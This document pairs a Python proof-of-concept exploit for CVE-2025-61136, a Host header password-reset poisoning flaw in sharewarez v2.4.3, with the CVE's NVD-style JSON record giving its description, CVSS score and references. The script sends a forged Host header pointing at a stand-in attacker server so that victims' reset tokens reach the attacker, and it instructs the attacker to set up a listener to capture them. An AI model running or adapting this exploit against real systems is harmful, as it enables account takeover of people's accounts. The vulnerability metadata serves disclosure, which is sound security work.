CVE-2025-61136

import requests # CVE-2025-61136 Password Reset Poisoning PoC # Target: axewater sharewarez v2.4.3 target_url = "http://target-server.com" attacker_server = "http://attacker-controlled-server.com" victim_email = "[email protected]" # Step 1: Send password reset request with malicious Host header endpoint = f"{target_url}/forgot-password" headers = { "Host": "attacker-controlled-server.com", # Malicious Host header "Content-Type": "application/x-www-form-urlencoded" } payload = {"email": victim_email} response = requests.post(endpoint, data=payload, headers=headers) print(f"[*] Password reset request sent to {victim_email}") print(f"[*] Response status: {response.status_code}") # Step 2: Attacker receives the reset link on their server # The victim will receive an email with a link like: # http://attacker-controlled-server.com/reset-password?token=XXX # Step 3: Once attacker captures the token, they can reset the password reset_endpoint = f"http://attacker-controlled-server.com/reset-password" print(f"[*] Attacker should set up listener on {reset_endpoint}")

{"cve": {"id": "CVE-2025-61136", "sourceIdentifier": "[email protected]", "published": "2025-10-23T15:15:44.213", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Host Header Injection vulnerability in the password reset component in axewater sharewarez v2.4.3 allows remote attackers to conduct password reset poisoning and account takeover via manipulation of the Host header when Flask's url_for(_external=True) generates reset links without a fixed SERVER_NAME."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://drive.google.com/file/d/15X5L1uEqgWOLrjKqm96cEPAWp2ph0zJp/view?usp=sharing", "source": "[email protected]"}, {"url": "https://gist.github.com/BrookeYangRui/145e529b5fd4f56af299efde37edf4fa", "source": "[email protected]"}, {"url": "https://github.com/axewater/sharewarez/blob/d04c90b7dc3fbae1596f731d1b168d3fb9fdd2df/modules/routes_login.py#L188-L217", "source": "[email protected]"}, {"url": "https://github.com/axewater/sharewarez/blob/d04c90b7dc3fbae1596f731d1b168d3fb9fdd2df/modules/utils_smtp.py#L191-L206", "source": "[email protected]"}, {"url": "https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning", "source": "[email protected]"}]}}